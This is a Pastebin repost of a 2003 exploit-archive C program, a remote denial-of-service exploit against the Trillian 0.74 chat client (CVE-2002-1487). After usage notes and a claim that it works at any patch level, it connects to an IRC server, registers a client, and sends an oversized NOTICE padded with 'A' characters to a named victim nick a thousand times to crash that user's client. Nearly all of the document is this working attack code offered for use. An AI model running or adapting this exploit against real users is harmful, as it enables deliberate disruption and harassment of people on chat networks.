Advertisement
FlyFar

Trillian 0.74 - Remote Denial of Service - CVE-2002-1487

Feb 5th, 2024
1,224
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.78 KB | Cybersecurity | 0 0
  1. /*
  2.  
  3. [--------------------------------------------]
  4. [:::::::::::::::::: trillian 0.7*(d patch)   ]
  5. [:::::Denial:of:Service::simple:exploit::]
  6. [-----------------------------[l0bstah]-----]
  7. [usage ::                                           ]
  8. [      : trillah name attacked-nick          ]
  9. [                                                       ]
  10. [comment:: after patch .74d, exploits,  ]
  11. [         wich use damage (~4095 data)  ]
  12. [         not work, but this exploit           ]
  13. [         work at any patch.                    ]
  14. [                                                       ]
  15. [P.S. irc specification include rull:          ]
  16. [510 characters maximum allowed for   ]
  17. [the command and its parameters...     ]
  18. [that is why szBuf has 570 length...       ]
  19. [--------------------------------------------]
  20.  
  21. */
  22.  
  23.  #include <winsock.h>
  24.  #include <iostream.h>
  25.  #include <stdio.h>
  26.  #include <dos.h>
  27.  
  28.  #define port    4384
  29.  #define bfsize  540
  30.  #define rptimes 1000
  31.  
  32.  WSADATA     wsadata;
  33.  SOCKADDR_IN sa;
  34.  SOCKET      s;
  35.  LPHOSTENT   lpHostEntry;
  36.  int         SockAddr = sizeof(struct sockaddr);
  37.  int         i, ports;
  38.  char        szBuf[570];          // [damage data]
  39.  char        nick[50];            // <NICK> command
  40.  char        user[50];            // <USER> command
  41.  char        mode[50];            // <MODE> command
  42.  char        *cname = "trillah";  // your client name
  43.  
  44.  
  45. int main(int argc, char **argv)
  46.  {
  47.  
  48.    printf("::::::::::::::::::::::::::::::::::::\n");
  49.    printf(": trillah - remote DoS exploit :::::\n");
  50.    printf(":::::::::::::::::::::::::::[l0bstah]\n");
  51.  
  52.    if (argc < 3)
  53.    { printf("use: trillah dnsname nick\n"); return 0; }
  54.    
  55.    char *addr=argv[1];
  56.    ports=port;
  57.  
  58.    if (WSAStartup(0x0101,&wsadata) == 0)
  59.    {
  60.  
  61.         lpHostEntry = gethostbyname(addr);
  62.  
  63.         sa.sin_family = AF_INET;
  64.         sa.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
  65.         sa.sin_port = htons(ports);
  66.  
  67.         if ((s=socket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET)
  68.         {
  69.         printf("Can't open socket! - #%d\n",WSAGetLastError());
  70.         exit(0);
  71.         }
  72.  
  73.         printf("connecting to irc server : %s...\n", addr);
  74.  
  75.         if (connect(s, (struct sockaddr*)&sa, sizeof(sa)) == -1)
  76.         {
  77.         printf("Can't connect() - #%d\n",WSAGetLastError());
  78.         exit(0);
  79.         }      
  80.         printf("connected... starting login session \n\n");
  81.  
  82.         //*** NICK <NICK>
  83.         strcpy(nick, "NICK ");
  84.         strcat(nick, cname);
  85.         strcat(nick, "\n");
  86.         send(s,
  87.                 nick,
  88.                 strlen(nick),
  89.                 0);
  90.  
  91.         printf(nick);
  92.  
  93.         //*** USER <mode> <unused> <realname>
  94.         strcpy(user, "USER ");
  95.         strcat(user, cname);
  96.         strcat(user, " 0 127.0.0.1 : trilla\n");
  97.         send(s,
  98.                 user,
  99.                 strlen(user),
  100.                 0);
  101.  
  102.         printf(user);
  103.  
  104.         sleep(1);
  105.  
  106.         //*** MODE <nick> (+|-*)
  107.         strcpy(mode, "MODE ");
  108.         strcat(mode, cname);
  109.         strcat(mode, " +i\n");
  110.         send(s,
  111.                 mode,
  112.                 strlen(mode),
  113.                 0);
  114.  
  115.         sleep(2);
  116.  
  117.         //**********DAMAGE****DATA*************//
  118.  
  119.         printf("Sending damage data...\n");
  120.         strcat(szBuf, "NOTICE ");
  121.         strcat(szBuf, argv[2]);
  122.         strcat(szBuf, " :");
  123.         for(i=0;i<=bfsize;i++) strcat(szBuf,"A");
  124.         strcat(szBuf, "\n");
  125.  
  126.  
  127.         for (i=0;i<=rptimes;i++)
  128.         {
  129.  
  130.         send(s,
  131.             szBuf,
  132.             strlen(szBuf),
  133.             0);
  134.         }
  135.  
  136.  
  137.         printf("attack complete....");
  138.  
  139.         //*************************************//
  140.  
  141.         closesocket(s);
  142.        
  143.         }
  144.  
  145.   WSACleanup();
  146.  
  147. }
  148.  
  149. // milw0rm.com [2003-08-01]
  150.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement